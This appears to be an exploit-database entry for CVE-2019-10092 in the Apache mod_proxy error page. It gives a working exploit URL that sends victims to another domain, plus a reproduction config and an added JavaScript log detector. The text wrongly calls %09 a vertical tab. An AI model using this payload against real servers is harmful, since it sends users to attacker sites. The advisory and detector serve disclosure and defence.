Apache Httpd mod_proxy - Error Page Cross-Site Scripting
Author: Sebastian Neef
type: webapps
platform: multiple
date_added: 2019-11-19
date_updated: 2019-11-19
verified: 0
codes: CVE-2019-10092
The trick is to use a vertical tab (`%09`) and then place another URL in the tag. Once a victim clicks the link on the error page, they are taken somewhere else.
As you can see, the browser changes the destination from the relative `/` to the absolute URL `https://enoflag.de`. The exploit URL is `http://domain.tld/%09//otherdomain.tld`.
Here's the httpd configuration to reproduce the behavior:
```
<Location />
    # Short timeouts: an unreachable backend quickly produces the proxy error page
    ProxyPass http://127.0.0.1:9000/ connectiontimeout=1 timeout=2
    ProxyPassReverse http://127.0.0.1:9000/
    Order allow,deny
    Allow from all
</Location>
```
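Why the reflected link leaves the site, and how to spot such requests in an access log: the following is an added example, not code from the original advisory or from Apache. It assumes the error page reflects the percent-decoded request path into the link's `href`; the function names and log lines are constructed for illustration.

```javascript
// Added example. Assumption: the proxy error page reflects the
// percent-decoded request path into the href of its link.
const ORIGIN = "http://domain.tld"; // placeholder host used on the page

// Return the URL a browser would navigate to for the reflected href.
function resolveReflectedHref(rawPath, origin = ORIGIN) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawPath); // "%09" -> U+0009 (tab)
  } catch {
    decoded = rawPath; // malformed escape: keep the raw path
  }
  // The WHATWG URL parser drops tab and newline characters before
  // parsing, so "/\t//host" is read as "///host" and the host part
  // becomes the authority instead of a path on the current site.
  return new URL(decoded, origin + "/");
}

// True when following the reflected link would leave the given origin.
function leavesOrigin(rawPath, origin = ORIGIN) {
  try {
    const target = resolveReflectedHref(rawPath, origin);
    return target.origin !== new URL(origin).origin;
  } catch {
    return false; // not parseable as a URL, nothing to follow
  }
}

// Constructed access-log lines (not from the original page).
const SAMPLE_LOG = [
  '203.0.113.7 - - [19/Nov/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 502 341',
  '203.0.113.7 - - [19/Nov/2019:10:00:02 +0000] "GET /%09//otherdomain.tld HTTP/1.1" 502 341',
  '203.0.113.7 - - [19/Nov/2019:10:00:03 +0000] "GET /search?q=a%09b HTTP/1.1" 502 341',
];

// Return the request paths whose reflected link would point off-site.
function flagLogLines(lines, origin = ORIGIN) {
  const hits = [];
  for (const line of lines) {
    const m = /"[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(line);
    if (m && leavesOrigin(m[1], origin)) hits.push(m[1]);
  }
  return hits;
}

console.log(flagLogLines(SAMPLE_LOG)); // [ '/%09//otherdomain.tld' ]
```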